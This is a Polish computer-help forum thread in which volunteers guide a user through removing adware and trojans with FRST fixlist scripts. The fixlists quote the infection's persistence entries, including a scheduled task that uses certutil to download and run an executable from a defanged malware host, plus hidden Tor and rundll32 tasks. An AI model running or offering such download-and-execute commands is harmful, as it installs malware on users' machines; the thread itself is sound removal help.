Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Problem z wirusami - blokada antywirusa

Arymateia 22 Maj 2018 17:56 357 17
  • #1 22 Maj 2018 17:56
    Arymateia
    Poziom 5  

    Witam. Otóż dziś, z własnej głupoty, ściągnęłam pewien program na komputer. W tym ściągnął on mnóstwo wirusów. Dzięki ADWCleaner udało mi się usunąć lwią część tych pasożytów, niestety 10 wirusów nie jest zdolne do całkowitego usunięcia.
    Prócz tego, że wśród tych 10 wirusów widnieje jeden Trojan-Agent, to możliwe, że on lub inny wirus blokuje mi dojście do włączenia programu Malwarebytes.
    Przesyłam logi z programu FRST:
    https://we.tl/nL6lvpJ0H5

    https://we.tl/9LvoJSYAPK

    https://we.tl/qOjjVoWejb

    Prosiłabym o bardzo szybki kontakt i pomoc.

    0 17
  • #2 22 Maj 2018 19:01
    krzychupar
    Poziom 40  

    Dwa razy zamieściłaś log frst.txt i brak jest additon.txt. I zamieść logi jako załączniki a nie przez jakieś dodatkowe badziewie.

    0
  • Pomocny post
    #4 22 Maj 2018 21:13
    krzychupar
    Poziom 40  

    Odinstaluj:

    CloudNet
    SafeFinder
    Driver Easy
    Otwórz notatnik systemowy i wklej:

    ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
    Task: {0C47C0B9-BD3A-4D59-A746-17B188A8AC65} - \Online Application V2G3 -> Brak pliku <==== UWAGA
    Task: {4C5E9A41-2A30-4F39-AFC2-1E4B234D1E64} - \System Healer Monitor -> Brak pliku <==== UWAGA
    Task: {58D7FF83-6299-4C99-A36D-3AA05C194D77} - \Online Application V2G1 -> Brak pliku <==== UWAGA
    Task: {59C1093F-0172-4E42-B5F2-E92F0A4AB0F6} - \Online Application V2G4 -> Brak pliku <==== UWAGA
    Task: {5A3FF8EA-A88F-4A53-985C-E5B4CDBFEE23} - \Updater_Online_Application -> Brak pliku <==== UWAGA
    Task: {62C98EEC-4212-42A7-8D4A-B1C868D5A432} - \Online Application V2G2 -> Brak pliku <==== UWAGA
    Task: {69FCE2D1-44AC-42FF-B91C-39B31A850D8E} - \RunBoosterUpdateTask -> Brak pliku <==== UWAGA
    Task: {B33EBD90-45D5-4F0D-8942-861616A6CED9} - \Online Application V2G6 -> Brak pliku <==== UWAGA
    Task: {C39EAD37-9924-4AEE-AA9A-25EEBA9C2418} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\Ada\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Ada\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    Task: {C8720A2E-B140-47D8-8646-6E34CC0968FE} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-22] () <==== UWAGA
    Task: {DE985A73-0E74-4BF8-861B-70C62CBCAE28} - \Online Application V2G5 -> Brak pliku <==== UWAGA
    Task: {E8A1E70E-06C4-43FB-B534-CF8709128F61} - \FastDataX Task -> Brak pliku <==== UWAGA
    Task: {FBEC76E6-3D4E-45C3-8A86-7ED6524B90C2} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\Ada\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Ada\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    Task: C:\Windows\Tasks\Driver Easy Scheduled Scan.job => D:\DriverEasy\DriverEasy.exe
    HKU\S-1-5-21-1999334296-505240776-616881285-1000\...\Run: [WanderingButterfly] => C:\Windows\rss\csrss.exe [3173376 2018-05-22] () <==== UWAGA
    HKU\S-1-5-21-1999334296-505240776-616881285-1000\...\MountPoints2: {7fc22983-4627-11e8-8512-806e6f6e6963} - F:\AutoRun.exe
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    Hosts: 127.0.0.1 app.drivereasy.com
    HKU\S-1-5-21-1999334296-505240776-616881285-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...myHj8S83DIDDvDqqO_j7bDvLk_09ZmO8jo2w,,&q={searchTerms}




    HKU\S-1-5-21-1999334296-505240776-616881285-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...wg5dHegCRov_kqHtWvshVt04Cw4-W06ZZSsE8eNDZ_g,,,,
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    S2 MicroService; C:\Users\Ada\AppData\Local\XService\XService.dll [X]
    R2 TCPSvc; "C:\Users\Ada\AppData\Local\Temp\csrss\proxy\Tor\tor.exe" --nt-service --SocksPort 7050 --Log "notice file C:\Users\Ada\AppData\Local\Temp\csrss\proxy\t" <==== UWAGA
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
    S3 RSUSBSTOR; System32\Drivers\RtsUStor.sys [X]
    S3 wacommousefilter; system32\DRIVERS\wacommousefilter.sys [X]
    S3 wacomvhid; system32\DRIVERS\wacomvhid.sys [X]
    2018-05-22 16:11 - 2018-05-22 16:11 - 000000266 __RSH C:\Users\Ada\ntuser.pol
    2018-05-22 16:08 - 2018-05-22 17:14 - 000000266 __RSH C:\ProgramData\ntuser.pol
    2018-05-22 16:06 - 2018-05-22 16:06 - 007611392 _____ C:\Users\Ada\AppData\Local\agent.dat
    2018-05-22 16:06 - 2018-05-22 16:06 - 001986316 _____ C:\Users\Ada\AppData\Local\Ran-Soft.tst
    2018-05-22 16:06 - 2018-05-22 16:06 - 001895384 _____ C:\Users\Ada\AppData\Local\AirIty.bin
    2018-05-22 16:06 - 2018-05-22 16:06 - 000278510 _____ C:\Users\Ada\AppData\Local\Warmtone.tst
    2018-05-22 16:06 - 2018-05-22 16:06 - 000126464 _____ C:\Users\Ada\AppData\Local\noah.dat
    2018-05-22 16:06 - 2018-05-22 16:06 - 000070896 _____ C:\Users\Ada\AppData\Local\Config.xml
    2018-05-22 16:06 - 2018-05-22 16:06 - 000005568 _____ C:\Users\Ada\AppData\Local\md.xml
    2018-05-22 16:05 - 2018-05-22 16:06 - 000929792 _____ C:\Users\Ada\AppData\Local\sham.db
    2018-05-22 16:05 - 2018-05-22 16:05 - 000140800 _____ C:\Users\Ada\AppData\Local\installer.dat
    2018-05-22 16:05 - 2018-05-22 16:05 - 000003214 _____ C:\Windows\System32\Tasks\ohbrj
    2018-05-22 16:05 - 2018-05-22 16:05 - 000000000 ____D C:\Users\Ada\AppData\Roaming\bscdw
    2018-05-22 16:06 - 2018-05-22 16:06 - 000005568 _____ () C:\Users\Ada\AppData\Local\md.xml
    2018-05-22 16:06 - 2018-05-22 16:06 - 000126464 _____ () C:\Users\Ada\AppData\Local\noah.dat
    2018-05-22 16:06 - 2018-05-22 16:06 - 001986316 _____ () C:\Users\Ada\AppData\Local\Ran-Soft.tst
    2018-05-22 16:06 - 2018-05-22 16:06 - 000032038 _____ () C:\Users\Ada\AppData\Local\uninstall_temp.ico
    2018-04-23 21:34 - 2018-04-23 21:34 - 000000003 _____ () C:\Users\Ada\AppData\Local\updater.log
    2018-04-23 21:34 - 2018-04-23 21:34 - 000000425 _____ () C:\Users\Ada\AppData\Local\UserProducts.xml
    2018-05-22 16:06 - 2018-05-22 16:06 - 000278510 _____ () C:\Users\Ada\AppData\Local\Warmtone.tst
    C:\Windows\rss\csrss.exe
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #5 22 Maj 2018 21:29
    Arymateia
    Poziom 5  

    Usunęłam Driver Easy oraz skopiowałam cały log do notatnika. Niestety mam ogromny problem z usunięciem CloudNet oraz SafeFinder.

    0
  • #6 22 Maj 2018 21:33
    krzychupar
    Poziom 40  

    Pomiń to na razie i wykonaj skrypt. Po wykonaniu zamieść nowe logi z FRST.

    0
  • #7 22 Maj 2018 21:52
    Arymateia
    Poziom 5  

    Sprawdziłam jeszcze stan wirusów za pomocą ADWCleaner. Trojany z 1 stało się ich aż 5.
    Nowe logi:

    EDIT
    Szybka aktualizacja:
    postanowiłam, po odkryciu tych 5 trojanów, usunąć za pomocą ADWCleaner. Po restarcie odblokował się Malwarebytes, przez co mogłam zrobić kompleksowe czyszczenie komputera. Usunął mi się SafeFinder i, jak na razie, nie mam żadnych wirusów. Jeśli coś się jednak zmieni, to dam znać. Nie mniej jednak dziękuję bardzo za tamte logi, bo głównie to one mi pomogły w naprawieniu komputera :)

    EDIT: Jedyne, co wyskakuje, to tak jakby "przełączanie się" z trybu normalnego na awaryjny podczas włączania komputera. W zasadzie to włącza mi się on normalnie, z tym że na ułamek sekundy mignie mi menu z opcją wyboru trybu normalnego lub awaryjnego, a po tym pokazuje się ekran ładowania jak w trybie awaryjnym. Gdy gaśnie, potem wszystko wraca do normy i włącza mi się system w trybie normalnym.
    Czy mam się czegoś obawiać, że system został uszkodzony, czy zlekceważyć? Ogółem Malwarebytes pokazuje brak wirusów.

    Scaliłem. RADU23

    0
  • #8 22 Maj 2018 22:25
    krzychupar
    Poziom 40  

    Ale wykonaj jeszcze to
    Otwórz notatnik systemowy i wklej:

    Task: {305E7023-1AF6-469A-B90C-F97AA3ED27E8} - \ohbrj -> Brak pliku <==== UWAGA
    Task: {1B77A213-71F1-4188-949A-B4CC5967A542} - System32\Tasks\{CE99B9E7-C516-4CEC-89AA-9B1F85BDC404} => C:\Windows\system32\pcalua.exe -a "C:\Users\Ada\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
    Task: {559AB1F9-DD62-4FB9-AC90-01DBEE461B0B} - System32\Tasks\{299980F5-F756-4364-AC02-7EBDF37DCB29} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\KinGotop\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\KinGotop\uninstall.dat" -a uninstallme 52EA0251-C7C7-4DBF-8AE9-E7BF4CC918E7 DeviceId=006d6538-8bf2-f504-57f8-42fe80946c3b BarcodeId=51198003 ChannelId=3 DistributerName=APSFWakeNet
    HKU\S-1-5-21-1999334296-505240776-616881285-1000\...\Run: [CloudNet] => "C:\Users\Ada\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" 2017

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #10 23 Maj 2018 20:28
    krzychupar
    Poziom 40  

    W logach czysto infekcji brak. Co do tego dziwnego okienka, które wyskakuje to może byś dokładnie opisała co to za okienko i w którym momencie wyskakuje. Można zamieścić jakieś zdjęcie dla ułatwienia.

    0
  • #11 23 Maj 2018 20:36
    Arymateia
    Poziom 5  

    Tak jak wcześniej wspomniałam - okienko wyboru trybu awaryjnego i normalnego pojawia się na ułamek sekundy podczas włączania komputera. Wtedy pokazuje mi się okno ładowania, jakby włączył mi się automatycznie tryb awaryjny. Po tym znika on i komputer dalej włącza się normalnie (pojawia się ekran do zalogowania się na konto na komputerze - system Windows 7). Niby potem nic się praktycznie nie dzieje, ale trochę martwię się tym przeskokiem podczas włączania. Niedawno miałam formatowanie komputera, więc nie chciałabym tego znowu powtarzać :/

    0
  • #12 23 Maj 2018 20:41
    krancki
    Poziom 3  

    Spróbuj użyć ComboFix

    Przejrzyj jeszcze konfiguracje Systemu Uruchom -> msconfig

    Moderowany przez DriverMSG:

    3.1.11. Nie wysyłaj wiadomości, które nic nie wnoszą do dyskusji. Wprowadzają w błąd, są niebezpieczne czy nie rozwiązują problemu użytkownika.

    0
  • #13 23 Maj 2018 20:44
    krzychupar
    Poziom 40  

    Kolego nie polecaj użycia Combofixa bo można więcej szkody narobić jak pożytku. Porada szkodliwa.

    0
  • #14 23 Maj 2018 20:46
    Kolobos
    Spec od komputerów

    Wykonaj Fixlist.txt dla FRST:
    Task: {40B36019-D51D-486A-B3F2-F172A6FDCD7B} - System32\Tasks\TUZwhpCbnzWcBoUhWSI2 => rundll32 "C:\Program Files (x86)\SvnSzzIscGyUC\CupvCoX.dll",#1
    Task: {6ACB57BD-BD47-4F8F-97E4-F9A322F4E13F} - System32\Tasks\wAJDAAZgOBCdyQgsK2 => rundll32 "C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\gltvhNA.dll",#1
    Task: {6C642E2F-7AF2-413A-8A72-7FC98595B1A3} - System32\Tasks\jbDyCmJOWCzWzi => rundll32 "C:\Program Files (x86)\EPVqpVJyVSWU2\KuDKSAXdThEAX.dll",#1
    Task: {8C9AACC1-F31A-4294-A038-76D6AFE34157} - System32\Tasks\RuvZlWnxKNkmGuM2 => rundll32 "C:\Program Files (x86)\KCGHGVOnU\uKAdhA.dll",#1
    R1 prifass; C:\Windows\System32\drivers\prifass.sys [115776 2018-05-11] ()
    R2 WinDivert1.2; C:\Windows\system32\drivers\WinDivert64.sys [37552 2018-05-22] (Basil)
    2018-05-22 16:08 - 2018-05-22 16:08 - 000037552 _____ (Basil) C:\Windows\system32\Drivers\WinDivert64.sys
    2018-05-22 16:08 - 2018-05-22 16:08 - 000003058 _____ C:\Windows\System32\Tasks\jbDyCmJOWCzWzi
    2018-05-22 16:08 - 2018-05-22 16:08 - 000002872 _____ C:\Windows\System32\Tasks\wAJDAAZgOBCdyQgsK2
    2018-05-22 16:08 - 2018-05-22 16:08 - 000002860 _____ C:\Windows\System32\Tasks\TUZwhpCbnzWcBoUhWSI2
    2018-05-22 16:08 - 2018-05-22 16:08 - 000002850 _____ C:\Windows\System32\Tasks\RuvZlWnxKNkmGuM2
    2018-04-22 22:30 - 2018-05-22 16:10 - 000000000 ____D C:\AdwCleaner



    @krzychupar spojrzales w ogole na logi?

    0
  • #15 24 Maj 2018 17:34
    Arymateia
    Poziom 5  

    Skorzystałam z loga, pokazał mi się teraz na dłużej opcja wyboru trybu normalnego i awaryjnego. Po usunięciu sterowników do drukarki (gdyż cały czas wyskakiwał mi błąd), ponownie zrestartowałam komputer. Powrót do "migawki" opcji wyboru trybu, tak jak przedtem. Zrobiłam ponownie skan za pomocą FRST.
    Zmartwiły mnie polecenia przy plikach Task, gdzie zaznaczono "brak pliku". Nie mam pojęcia, jak je przywrócić. Zaintrygowały mnie także rejestry przy kategorii o Trybie Awaryjnym (oba są w Addition.txt). Zauważyłam także błędy spowodowane aplikacją HP (to od drukarki), pomimo iż odinstalowałam ją. Dalej w kategorii Windows Defender, FRST odkrył adware'a (Malwarebytes go nie wykrył).
    Ogółem dalej jestem za głupia w pragramistyczne sprawy, więc ponownie proszę Was o pomoc. Wybaczcie, że Was tak męczę, ale naprawdę nie wiem, co jest nie tak w moim komputerze.

    0
  • #16 24 Maj 2018 22:35
    RADU23
    Moderator - Komputery Serwis

    W logach nie widać już niczego niepokojącego.

    0
  • #17 24 Maj 2018 23:02
    Arymateia
    Poziom 5  

    A te adware'y, które wykrył Windows Defender? Brakujące pliki task? Pliki HP, które nie powinny istnieć, gdyż odinstalowałam ją? Wszystko, co wypisuję, pojawia się w pliku Addition.txt. Chciałabym mieć mimo wszystko pewność, że mam czysty komputer D:

    0
  • #18 24 Maj 2018 23:04
    RADU23
    Moderator - Komputery Serwis

    Wykonaj taki fixlist:

    Cytat:
    Task: {40B36019-D51D-486A-B3F2-F172A6FDCD7B} - \TUZwhpCbnzWcBoUhWSI2 -> Brak pliku <==== UWAGA
    Task: {6ACB57BD-BD47-4F8F-97E4-F9A322F4E13F} - \wAJDAAZgOBCdyQgsK2 -> Brak pliku <==== UWAGA
    Task: {6C642E2F-7AF2-413A-8A72-7FC98595B1A3} - \jbDyCmJOWCzWzi -> Brak pliku <==== UWAGA
    Task: {8C9AACC1-F31A-4294-A038-76D6AFE34157} - \RuvZlWnxKNkmGuM2 -> Brak pliku <==== UWAGA

    0